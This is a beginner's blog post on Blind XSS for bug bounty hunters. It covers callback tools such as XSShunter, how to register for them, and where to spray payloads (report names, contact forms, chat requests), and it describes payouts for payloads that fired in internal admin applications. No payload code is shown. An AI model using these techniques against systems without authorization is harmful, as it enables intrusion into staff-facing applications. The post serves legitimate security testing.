avatarSyntax Error

Summary

The article provides a beginner's guide to Blind XSS, detailing tools, techniques, and practical examples for bug bounty hunters.

Abstract

The web content is a comprehensive guide aimed at novice bug bounty hunters interested in Blind XSS. It addresses common questions about Blind XSS, tools like XSShunter, ezXSS, bXSS, KNOXSS, and Burp Collaborator, and how to register for and use these tools effectively. The author shares personal experiences with Blind XSS, including a detailed account of a high-paying bug bounty discovery and provides tips from top bug bounty hunters on where to spray payloads. Additionally, the article offers a method to verify the functionality of XSShunter and invites readers to reach out for further questions.

Opinions

  • The author believes that XSShunter is a valuable tool for finding Blind XSS, emphasizing its ease of use and free access.
  • The article suggests that patience and persistence are key in bug bounty hunting, as demonstrated by the author's own experience with a private bounty site.
  • Top bug bounty hunters' advice is highly regarded, with the author recommending their strategies for payload spraying.
  • The author expresses a preference for using the web version of XSShunter over setting it up on a server due to a lack of patience for such a setup.
  • The article implies that Blind XSS can be a lucrative area of bug bounty hunting, as evidenced by the author's $5000 payout for a single report.
  • The author provides a simple test method to ensure XSShunter is functioning correctly, showing a commitment to practical and actionable advice.
  • The use of humor and a casual tone indicates that the author aims to make the topic approachable for beginners, while also respecting the expertise of more experienced readers.

Blind XSS for beginners

I get a lot of DM’s in twitter asking questions about Blind XSS like which tool to use, how to register in XSShunter, where to spray the payload etc etc.So I am writing this blog in hopes of answering some of those questions. Note: This article is for people who are just starting with bug bounty hunting.Leets can leave this blog right here:)

What is Blind XSS?

It is a type of stored XSS where attackers input is saved by server and is reflected in a totally different application used by system admin/team member.

Tools you can use for Blind XSS:

Currently I use the web version of XSShunter for finding Blind XSS.There are few other tools which you can use:

  • ezXSS(has 2FA, email reports, share reports feature)
  • bXSS(Has slack/sms notification feature)
  • KNOXSS(has email feature)
  • Burp Collaborator

How to register for XSShunter? Is it free? Do we need a domain in our name to use XSShunter?

I use the web version of XSShunter as I don’t have patience to setup the tool on my server:) Its free of cost and you can set it up by visiting XSShunter website .Enter all the mandatory fields, in the Custom Subdomain text box you can enter any 2–3 characters.(You are not supposed to enter your website URL here:)).With that you should be set to use the tool.

You can setup XSSHunter on your server by following these instructions

I also use the KNOXSS firefox plugin sometimes.If knoxss finds Blind XSS in a website it will mail you the vulnerability details.

So where do you get the payloads from and where do you spray the payloads?

Within XSShunter there is a tab for payloads,You can get all the payloads from there and its better to have a copy of all the payloads locally with you so that you can use/spray it when you need it.

Now moving to questions about where to spray these payloads, this has been discussed on twitter/slack a lot of times.Here are few tips from top BB hunters.

Any interesting BXSS which I have found?

  • In a private bounty site, there was an option to create reports.I created a new report with report name as blind XSS payload.For my Luck, the company had a daily batch job which would sync the data across all their QA/Stage and pentest environments. Next day my XSShunter portal was full of reports with payload firing in 6–7 different internal environments owned by customer .Company Paid 5000$ for BXSS in 6 different endpoints.
  • Submitted Blind XSS payload in contact me form in PBB program and it fired in their backend salesforce application.
  • Submitted Blind XSS payload in a chat request and it fired in marketo application which company was using to collect chat data.

Any other writeups/tutorials to refer?

Update(30/07/2018)

Many of you had question about how to check if XSShunter is working fine or not.Simple!

Take all the payloads from the XSShunter site and save it into a HTML file and open that html file in your browser.After file has opened,go to XSShunter and check if you see any new entries.If there are entries then XSShunter is working fine.

For any questions, you can get in touch with me at Syntaxerror

until next time

Security
Xss
Blindxss
Bugcrowd
Hackerone
Recommended from ReadMedium
avatarJonathan Mondaut
How ChatGPT Turned Me into a Hacker

Discover how ChatGPT helped me become a hacker, from gathering resources to tackling CTF challenges, all with the power of AI.

4 min read
avatarkriss_
An XSS Vulnerability on a Sui Web3 Social Application called Suia has been Found and Fixed.

kriss_, the Founder of Scallop, uncovered a critical XSS vulnerability within Suia, a prominent Sui-based Web3 Social Application. Upon his…

5 min read
avatarHamza Avvan
4 XSSs With A Simple & Optimized Payload

Check out how I earned $1250 by bypassing WAF in Steal User Information — Chaining XSS & Http Parameter Pollution using an amazing…

3 min read
avatarMuthu D
How I Bypassed 2FA and Earned My First Bounty $$$

Hacker Summary:

3 min read
avatarMr Abdullah
Automate your Google Dorking to Find Bugs

بِسْمِ ٱللَّٰهِ ٱلرَّحْمَٰنِ ٱلرَّحِيمِ

3 min read
avatarMu1berry
An Interesting Case of XSS Caused by File Upload

Hello hackers,

2 min read